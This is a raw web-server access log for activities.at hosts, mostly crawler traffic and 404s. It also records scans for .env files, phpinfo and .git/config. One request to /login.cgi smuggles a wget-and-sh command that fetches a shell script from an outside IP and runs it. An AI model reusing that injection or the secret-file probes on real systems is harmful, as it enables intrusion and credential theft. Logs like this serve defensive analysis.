172.169.2.80 - - [18/Dec/2024:01:04:25 +0100] "GET /actuator/health HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [18/Dec/2024:01:07:40 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/toolbar%20quick%20mode.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Dec/2024:01:11:41 +0100] "GET /ed.activities.at/stats/lang/awstats-nl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.205 - - [18/Dec/2024:01:14:16 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
173.252.83.114 - - [18/Dec/2024:01:21:50 +0100] "GET /robots.txt HTTP/1.1" 404 366 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
141.98.11.155 - - [18/Dec/2024:01:32:42 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
95.214.53.91 - - [18/Dec/2024:01:34:22 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [18/Dec/2024:01:42:20 +0100] "GET /ed.activities.at/stats/lang/awstats-gl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [18/Dec/2024:01:46:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [18/Dec/2024:01:46:20 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108121603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.74 - - [18/Dec/2024:01:46:23 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.136 - - [18/Dec/2024:01:50:20 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106141603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.110.241.49 - - [18/Dec/2024:02:05:08 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
156.59.198.135 - - [18/Dec/2024:02:10:23 +0100] "GET /renault.activities.at/htdocs/ewp/ew_includes/popups/ew_images/refresh.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Dec/2024:02:14:23 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image143.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.202 - - [18/Dec/2024:02:15:50 +0100] "\x16\x03\x01" 400 383 "-" "-"
198.235.24.202 - - [18/Dec/2024:02:15:50 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [18/Dec/2024:02:18:24 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image151.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.43 - - [18/Dec/2024:02:21:30 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [18/Dec/2024:02:22:24 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/rgba8.png HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Dec/2024:02:26:24 +0100] "GET /renault.activities.at/htdocs/binaries/10279221.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Dec/2024:02:30:25 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108251203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.74 - - [18/Dec/2024:02:31:37 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.136 - - [18/Dec/2024:02:34:25 +0100] "GET /ed.activities.at/stats/lang/awstats-cn.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.213.187.122 - - [18/Dec/2024:02:47:16 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
95.214.53.205 - - [18/Dec/2024:02:52:49 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
178.215.236.240 - - [18/Dec/2024:03:04:10 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:31.0) Gecko/20100101 Firefox/31.0"
95.214.55.74 - - [18/Dec/2024:03:09:53 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.136 - - [18/Dec/2024:03:23:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101221703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
76.11.185.195 - - [18/Dec/2024:03:30:28 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you"
154.213.187.237 - - [18/Dec/2024:03:35:29 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
156.59.198.136 - - [18/Dec/2024:03:43:22 +0100] "GET /renault.activities.at/htdocs/binaries/10069856.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Dec/2024:03:48:56 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104011103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
35.219.230.197 - - [18/Dec/2024:03:53:43 +0100] "GET / HTTP/1.1" 200 274 "-" "WanScannerBot/1.0"
156.59.198.136 - - [18/Dec/2024:03:56:38 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106251203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Dec/2024:04:00:38 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912111103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.74 - - [18/Dec/2024:04:04:09 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [18/Dec/2024:04:05:23 +0100] "GET /renault.activities.at/htdocs/binaries/10462869.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Dec/2024:04:25:25 +0100] "GET /ed.activities.at/stats/lang/awstats-pt.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Dec/2024:04:29:25 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008121103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.74 - - [18/Dec/2024:04:47:34 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
95.214.53.205 - - [18/Dec/2024:04:47:59 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
194.38.23.18 - - [18/Dec/2024:04:53:49 +0100] "GET /index.php?option=com_acym&ctrl=frontmails&task=setNewIconShare HTTP/1.1" 200 423 "-" "ALittle Client"
194.38.23.18 - - [18/Dec/2024:04:53:58 +0100] "GET /index.php?option=com_acym&ctrl=frontmails&task=setNewIconShare HTTP/1.1" 200 423 "-" "ALittle Client"
156.59.198.135 - - [18/Dec/2024:04:55:05 +0100] "GET /renault.activities.at/htdocs/binaries/10015817.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Dec/2024:04:59:05 +0100] "GET /ed.activities.at/stats/lang/awstats-ba.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Dec/2024:05:03:06 +0100] "GET /docs/ecommlogistics/belege/STORNORE17-00010.PDF HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.32.126.214 - - [18/Dec/2024:05:10:11 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
87.120.115.119 - - [18/Dec/2024:05:16:00 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML like Gecko) Mobile/12A405 Version/7.0 Safari/9537.53"
35.187.186.25 - - [18/Dec/2024:05:29:12 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
95.214.55.74 - - [18/Dec/2024:05:38:12 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
198.235.24.195 - - [18/Dec/2024:05:42:10 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
71.6.134.234 - - [18/Dec/2024:05:48:58 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.136 - - [18/Dec/2024:05:51:58 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912021203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
71.6.134.234 - - [18/Dec/2024:06:04:54 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
71.6.134.234 - - [18/Dec/2024:06:07:23 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
156.59.198.136 - - [18/Dec/2024:06:12:34 +0100] "GET /renault.activities.at/htdocs/binaries/10661427.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Dec/2024:06:16:34 +0100] "GET /docs/ecommlogistics/belege/STORNORE16-000008.PDF HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Dec/2024:06:20:35 +0100] "GET /ed.activities.at/stats/lang/awstats-th.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.74 - - [18/Dec/2024:06:20:45 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.136 - - [18/Dec/2024:06:24:35 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108021403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
103.67.162.206 - - [18/Dec/2024:06:25:49 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.67.162.206 - - [18/Dec/2024:06:25:50 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
95.214.55.79 - - [18/Dec/2024:06:26:10 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
146.120.241.12 - - [18/Dec/2024:06:27:48 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
156.59.198.135 - - [18/Dec/2024:06:28:35 +0100] "GET /renault.activities.at/htdocs/binaries/10489094.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
78.153.140.223 - - [18/Dec/2024:06:32:29 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
78.153.140.223 - - [18/Dec/2024:06:32:29 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.223 - - [18/Dec/2024:06:32:57 +0100] "GET /demo/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; LGL39C/V100 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.223 - - [18/Dec/2024:06:33:10 +0100] "GET /dev/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/538.1 (KHTML, like Gecko) CustomBrowser Safari/538.1"
78.153.140.223 - - [18/Dec/2024:06:33:31 +0100] "GET /doc/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0"
78.153.140.223 - - [18/Dec/2024:06:33:46 +0100] "GET /docs/.env HTTP/1.1" 404 354 "-" "Opera/9.80 (Windows NT 6.1; WOW64; Edition Yx) Presto/2.12.388 Version/12.14"
78.153.140.223 - - [18/Dec/2024:06:34:02 +0100] "GET /download/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36"
78.153.140.223 - - [18/Dec/2024:06:34:17 +0100] "GET /env/.env HTTP/1.1" 404 353 "-" "Opera/8.50 (Windows NT 5.1; U; ru)"
78.153.140.223 - - [18/Dec/2024:06:34:29 +0100] "GET /frontend/web/debug/default/view HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
78.153.140.223 - - [18/Dec/2024:06:34:38 +0100] "GET /html/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36 OPR/35.0.2066.68"
78.153.140.223 - - [18/Dec/2024:06:34:46 +0100] "GET /inc/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Linux; U; Android 4.3; en-au; GT-I9305 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.223 - - [18/Dec/2024:06:34:54 +0100] "GET /info/ HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)"
78.153.140.223 - - [18/Dec/2024:06:34:56 +0100] "GET /infophp.php HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 OPR/44.0.2510.1159"
78.153.140.223 - - [18/Dec/2024:06:35:03 +0100] "GET /infos.php HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; LG-MS840 Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.223 - - [18/Dec/2024:06:35:25 +0100] "GET /infos/ HTTP/1.1" 404 351 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1"
78.153.140.223 - - [18/Dec/2024:06:35:31 +0100] "GET /lib/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5"
78.153.140.223 - - [18/Dec/2024:06:35:43 +0100] "GET /library/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; pt-br; GT-S7562L Build/IMM76I) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.223 - - [18/Dec/2024:06:35:48 +0100] "GET /logging/.env HTTP/1.1" 404 357 "-" "Opera/9.52 (X11; Linux i686; U; cs)"
78.153.140.223 - - [18/Dec/2024:06:36:02 +0100] "GET /media/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.6 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.6"
78.153.140.223 - - [18/Dec/2024:06:36:27 +0100] "GET /misc/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.56 Safari/537.4"
78.153.140.223 - - [18/Dec/2024:06:36:38 +0100] "GET /new/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; ARM; Trident/6.0; Touch)"
78.153.140.223 - - [18/Dec/2024:06:36:50 +0100] "GET /phpinfo.php HTTP/1.1" 200 62914 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9"
78.153.140.223 - - [18/Dec/2024:06:37:46 +0100] "GET /phpinfos/ HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG SM-T320 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36"
78.153.140.223 - - [18/Dec/2024:06:38:00 +0100] "GET /pinfo.php HTTP/1.1" 404 354 "-" "Opera/9.62 (Windows NT 6.0; U; en-GB) Presto/2.1.1"
78.153.140.223 - - [18/Dec/2024:06:38:11 +0100] "GET /production/.env HTTP/1.1" 404 360 "-" "Opera/7.54 (Windows NT 5.1; U) [de]"
78.153.140.223 - - [18/Dec/2024:06:38:30 +0100] "GET /public/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0"
78.153.140.223 - - [18/Dec/2024:06:38:32 +0100] "GET /public_html/.env HTTP/1.1" 404 361 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; BRI/2; AskTbORJ/5.15.14.29495; yie8)"
78.153.140.223 - - [18/Dec/2024:06:38:34 +0100] "GET /server/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6) AppleWebKit/531.4 (KHTML, like Gecko) Version/4.0.3 Safari/531.4"
78.153.140.223 - - [18/Dec/2024:06:38:39 +0100] "GET /shared/.env HTTP/1.1" 404 356 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; InfoPath.3)"
78.153.140.223 - - [18/Dec/2024:06:38:41 +0100] "GET /site/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6"
78.153.140.223 - - [18/Dec/2024:06:38:50 +0100] "GET /stage/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-J327T1 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36"
78.153.140.223 - - [18/Dec/2024:06:38:52 +0100] "GET /staging/.env HTTP/1.1" 404 357 "-" "Opera/9.00 (Macintosh; PPC Mac OS X; U; es)"
78.153.140.223 - - [18/Dec/2024:06:38:59 +0100] "GET /tool/view/phpinfo.view.php HTTP/1.1" 404 371 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"
156.59.198.136 - - [18/Dec/2024:06:39:09 +0100] "GET /hausegger.activities.at/stats/lang/awstats-cy.txt HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
78.153.140.223 - - [18/Dec/2024:06:39:12 +0100] "GET /upload/.env HTTP/1.1" 404 356 "-" "Opera/9.62 (X11; Linux i686; U; pt-BR) Presto/2.1.1"
78.153.140.223 - - [18/Dec/2024:06:39:16 +0100] "GET /vendor/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20070604 Firefox/2.0.0.4"
78.153.140.223 - - [18/Dec/2024:06:39:21 +0100] "GET /web/.env HTTP/1.1" 404 353 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54u1 [en]"
78.153.140.223 - - [18/Dec/2024:06:39:29 +0100] "GET /web/debug/default/view HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Windows NT 10.0; rv:59.0) Gecko/20100101 Firefox/59.0"
156.59.198.135 - - [18/Dec/2024:06:46:28 +0100] "GET /ed.activities.at/stats/lang/awstats-al.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Dec/2024:06:50:28 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103150903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.137 - - [18/Dec/2024:06:55:37 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
3.145.92.197 - - [18/Dec/2024:06:57:08 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
95.214.53.205 - - [18/Dec/2024:06:57:23 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
95.214.55.74 - - [18/Dec/2024:07:06:35 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [18/Dec/2024:07:12:37 +0100] "GET /ed.activities.at/stats/lang/awstats-nb.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
94.156.248.28 - - [18/Dec/2024:07:30:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.43 - - [18/Dec/2024:07:35:46 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.213.187.122 - - [18/Dec/2024:07:40:17 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
95.214.55.74 - - [18/Dec/2024:07:53:03 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
199.127.63.64 - - [18/Dec/2024:08:10:33 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.136 - - [18/Dec/2024:08:12:03 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202012071103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Dec/2024:08:16:03 +0100] "GET /ed.activities.at/stats/lang/awstats-tr.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [18/Dec/2024:08:17:50 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
